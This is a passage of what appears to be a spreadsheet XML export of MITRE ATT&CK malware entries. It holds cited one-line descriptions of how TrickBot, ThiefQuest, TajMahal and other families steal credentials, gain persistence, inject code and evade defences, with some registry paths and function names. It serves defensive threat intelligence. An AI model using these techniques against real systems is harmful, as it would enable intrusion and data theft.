    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to decrypt, load, and execute a DLL and its resources.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to discover drive information on the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to upload and download files to and from the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) can use ICMP to receive information on the destination server.(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to list processes on the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to inject code into the svchost.exe, iexplorer.exe, explorer.exe, and default browser processes.(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to proxy communications with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has encrypted network communications with RC4.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to identify the IP of the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to execute shell commands on the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of injecting code into the APC queue of a created [Rundll32](https://attack.mitre.org/techniques/T1218/011) process as part of an "Early Bird injection."(Citation: CyberBit Early Bird Apr 2018)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of downloading additional files.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of writing to a Registry Run key to establish.(Citation: CyberBit Early Bird Apr 2018)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of taking screenshots.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of gathering system information.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of creating a reverse shell.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>One [TYPEFRAME](https://attack.mitre.org/software/S0263) variant decrypts an archive using an RC4 key, then decompresses and installs the decrypted malicious DLL module. Another variant decodes the embedded file by XORing it with the value "0x35".(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can open the Windows Firewall on the victim’s machine to allow incoming connections.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can delete files off the system.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can search directories for files on the victim’s machine.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can upload and download files to the victim’s machine.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>A Word document delivering [TYPEFRAME](https://attack.mitre.org/software/S0263) prompts the user to enable macro execution.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can install encrypted configuration data under the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs&lt;/code&gt;.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) has used ports 443, 8080, and 8443 with a FakeTLS method.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>APIs and strings in some [TYPEFRAME](https://attack.mitre.org/software/S0263) variants are RC4 encrypted. Another variant is encoded with XOR.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>A [TYPEFRAME](https://attack.mitre.org/software/S0263) variant can force the compromised system to function as a proxy server.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can gather the disk volume information.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) has used a malicious Word document for delivery with VBA macros for execution.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can uninstall malware components using a batch script.(Citation: US-CERT TYPEFRAME June 2018) [TYPEFRAME](https://attack.mitre.org/software/S0263) can execute commands using a shell.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) variants can add malicious DLL modules as new services.[TYPEFRAME](https://attack.mitre.org/software/S0263) can also delete services from the victim’s machine.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can perform DLL loading.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) uses RC4 to encrypt the message body of HTTP content.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to use the open source libraries XZip/Xunzip and zlib to compress files.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture VoiceIP application audio on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to index and compress files into a send queue for exfiltration.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to manage an automated queue of egress files and commands sent to its C2.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal data from the clipboard of an infected host.(Citation: Kaspersky TajMahal April 2019)
</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal documents from the local system including the print spooler queue.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject DLLs for malicious plugins into running processes.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to send collected files over its C2.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to index files from drives, user profiles, and removable drives.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture keystrokes on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) can set the &lt;code&gt;KeepPrintedJobs&lt;/code&gt; attribute for configured printers in &lt;code&gt;SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers&lt;/code&gt; to enable document stealing.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has used an encrypted Virtual File System to store plugins.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify connected Apple devices.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify running processes and associated plugins on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify which anti-virus products, firewalls, and anti-spyware products are in use.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject the &lt;code&gt;LoadLibrary&lt;/code&gt; call template DLL into running processes.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify the Internet Explorer (IE) version on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal web session cookies from Internet Explorer, Netscape Navigator, FireFox and RealNetworks applications.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify hardware information, the computer name, and OS information on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify the MAC address on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to determine local time on a compromised host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture webcam video.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[Tasklist](https://attack.mitre.org/software/S0057) can be used to discover processes running on a system.(Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>[Tasklist](https://attack.mitre.org/software/S0057) can be used to enumerate security software currently running on a system by process name of known products.(Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>[Tasklist](https://attack.mitre.org/software/S0057) can be used to discover services running on a system.(Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses [AppleScript](https://attack.mitre.org/techniques/T1059/002)'s &lt;code&gt;osascript -e&lt;/code&gt; command to launch [ThiefQuest](https://attack.mitre.org/software/S0595)'s persistence via [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004). (Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) searches through the &lt;code&gt;/Users/&lt;/code&gt; folder looking for executable files. For each executable, [ThiefQuest](https://attack.mitre.org/software/S0595) prepends a copy of itself to the beginning of the file. When the file is executed, the [ThiefQuest](https://attack.mitre.org/software/S0595) code is executed first. [ThiefQuest](https://attack.mitre.org/software/S0595) creates a hidden file, copies the original target executable to the file, then executes the new hidden file to maintain the appearance of normal behavior. (Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) encrypts a set of file extensions on a host, deletes the original files, and provides a ransom note with no contact information.(Citation: wardle evilquest partii)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses the function &lt;code&gt;kill_unwanted&lt;/code&gt; to obtain a list of running processes and kills each process matching a list of security related processes.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) exfiltrates targeted file extensions in the &lt;code&gt;/Users/&lt;/code&gt; folder to the command and control server via unencrypted HTTP. Network packets contain a string with two pieces of information: a file path and the contents of the file in a base64 encoded string.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) hides a copy of itself in the user's &lt;code&gt;~/Library&lt;/code&gt; directory by using a &lt;code&gt;.&lt;/code&gt; at the beginning of the file name followed by 9 random characters.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses the &lt;code&gt;CGEventTap&lt;/code&gt; functions to perform keylogging.(Citation: Trendmicro Evolving ThiefQuest 2020)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) installs a launch item using an embedded encrypted launch agent property list template. The plist file is installed in the &lt;code&gt;~/Library/LaunchAgents/&lt;/code&gt; folder and configured with the path to the persistent binary located in the &lt;code&gt;~/Library/&lt;/code&gt; folder.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>When running with root privileges after a [Launch Agent](https://attack.mitre.org/techniques/T1543/001) is installed, [ThiefQuest](https://attack.mitre.org/software/S0595) installs a plist file to the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder with the &lt;code&gt;RunAtLoad&lt;/code&gt; key set to &lt;code&gt;true&lt;/code&gt; establishing persistence as a Launch Daemon. (Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) prepends a copy of itself to the beginning of an executable file while maintaining the name of the executable.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) obtains a list of running processes using the function &lt;code&gt;kill_unwanted&lt;/code&gt;.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses the &lt;code&gt;kill_unwanted&lt;/code&gt; function to get a list of running processes, compares each process with an encrypted list of “unwanted” security related programs, and kills the processes for security related programs.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t xml:space="preserve">[ThiefQuest](https://attack.mitre.org/software/S0595) uses a function named &lt;code&gt;is_debugging&lt;/code&gt; to perform anti-debugging logic. The function invokes &lt;code&gt;sysctl&lt;/code&gt; checking the returned value of &lt;code&gt;P_TRACED&lt;/code&gt;. [ThiefQuest](https://attack.mitre.org/software/S0595) also calls &lt;code&gt;ptrace&lt;/code&gt; with the &lt;code&gt;PTRACE_DENY_ATTACH&lt;/code&gt; flag to prevent debugging.  </t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) invokes &lt;code&gt;time&lt;/code&gt; call to check the system's time, executes a &lt;code&gt;sleep&lt;/code&gt; command, invokes a second &lt;code&gt;time&lt;/code&gt; call, and then compares the time difference between the two &lt;code&gt;time&lt;/code&gt; calls and the amount of time the system slept to identify the sandbox.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uploads files via unencrypted HTTP. (Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) contains functionality to collect information from the clipboard.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) can disable Avira anti-virus.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) contains keylogger functionality.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) can create a shortcut in the Windows startup folder for persistence.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) contains screen capture functionality.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) supports execution from the command-line.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) can install as a Windows service for persistence.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Tor](https://attack.mitre.org/software/S0183) encapsulates traffic in multiple layers of encryption, using TLS by default.(Citation: Dingledine Tor The Second-Generation Onion Router)</t>
  </si>
  <si>
    <t>Traffic traversing the [Tor](https://attack.mitre.org/software/S0183) network will be forwarded to multiple nodes before exiting the [Tor](https://attack.mitre.org/software/S0183) network and continuing on to its intended destination.(Citation: Dingledine Tor The Second-Generation Onion Router)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can implant malicious code into a compromised device's firmware.(Citation: Eclypsium Trickboot December 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has come with a signed downloader component.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) used COM to setup scheduled task for persistence.(Citation: ESET Trickbot Oct 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[TrickBot](https://attack.mitre.org/software/S0266) has the ability to capture RDP credentials by capturing the &lt;code&gt;CredEnumerateA&lt;/code&gt; API(Citation: TrendMicro Trickbot Feb 2019) </t>
  </si>
  <si>
    <t>Credential Stuffing</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses brute-force attack against RDP with rdpscanDll module.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP.(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019) Additionally, it searches for the ".vnc.lnk" affix to steal VNC credentials.(Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using [esentutl](https://attack.mitre.org/software/S0404).(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has retrieved PuTTY credentials by querying the &lt;code&gt;Software\SimonTatham\Putty\Sessions&lt;/code&gt; registry key (Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects local files and information from the victim’s local machine.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) decodes the configuration data and modules.(Citation: Fidelis TrickBot Oct 2016)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can disable Windows Defender.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can gather information about domain trusts by utilizing [Nltest](https://attack.mitre.org/software/S0359).(Citation: Fortinet TrickBot)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects email addresses from Outlook.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can send information about the compromised host to a hardcoded C2 server.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) utilizes EternalBlue and EternalRomance exploits for lateral movement in the modules wormwinDll, wormDll, mwormDll, nwormDll, tabDll.(Citation: ESET Trickbot Oct 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) module "Trickboot" can write or erase the UEFI/BIOS firmware of a compromised device.(Citation: Eclypsium Trickboot December 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) downloads several additional files and saves them to the victim's machine.(Citation: Trend Micro Totbrick Oct 2016)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects the users of the system.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has attempted to get users to launch malicious documents to deliver its payload. (Citation: TrendMicro Trickbot Feb 2019)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page.(Citation: Fidelis TrickBot Oct 2016)(Citation: IBM TrickBot Nov 2016)(Citation: Microsoft Totbrick Oct 2017)(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>The [TrickBot](https://attack.mitre.org/software/S0266) downloader has used an icon to appear as a Microsoft Word document.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can modify registry entries.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses the Windows API call, CreateProcessW(), to manage execution flow.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>Some [TrickBot](https://attack.mitre.org/software/S0266) samples have used HTTP over ports 447 and 8082 for C2.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: Trend Micro Totbrick Oct 2016)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can steal passwords from the KeePass open source password manager.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can identify the groups the user on a compromised host belongs to.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses module networkDll for process list discovery.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) injects into the svchost.exe process.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Totbrick Oct 2016)(Citation: Microsoft Totbrick Oct 2017)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) establishes persistence in the Startup folder.(Citation: ESET Trickbot Oct 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses vncDll module to remote control the victim machine.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can enumerate computers and network devices.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) creates a scheduled task on the system that provides persistence.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Totbrick Oct 2016)(Citation: Microsoft Totbrick Oct 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) leverages a custom packer to obfuscate its functionality.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used an email with an Excel sheet containing a malicious macro to deploy the malware(Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has been delivered via malicious links in phishing e-mails.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can Base64-encode C2 commands.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic.(Citation: Fidelis TrickBot Oct 2016)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) gathers the OS version, machine name, CPU type, amount of RAM available, and UEFI/BIOS firmware information from the victim’s machine.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: Cyberreason Anchor December 2019)(Citation: Eclypsium Trickboot December 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) obtains the IP address, location, and other relevant network information from the victim’s machine.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can identify the user and groups the user belongs to on a compromised host.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects a list of install programs and services on the system’s machine.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.(Citation: S2 Grupo TrickBot June 2017)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used macros in Excel documents to download and deploy the malware on the user’s machine.(Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) establishes persistence by creating an autostart service that allows it to run whenever the machine boots.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Trojan.Karagany](https://attack.mitre.org/software/S0094) can monitor the titles of open windows to identify specific keywords.(Citation: Secureworks Karagany July 2019)  </t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can secure C2 communications with SSL and TLS.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can steal data and credentials from browsers.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) has used plugins with a self-delete capability.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can enumerate files and directories on a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can upload, download, and execute files on the victim.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can capture keystrokes on a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can create directories to store plugin output and stage data for exfiltration.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can dump passwords and save them into &lt;code&gt;\ProgramData\Mail\MailAg\pwds.txt&lt;/code&gt;.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can base64 encode and AES-128-CBC encrypt data prior to transmission.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can use [Tasklist](https://attack.mitre.org/software/S0057) to collect a list of running tasks.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can create a link to itself in the Startup folder to automatically start itself upon system restart.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
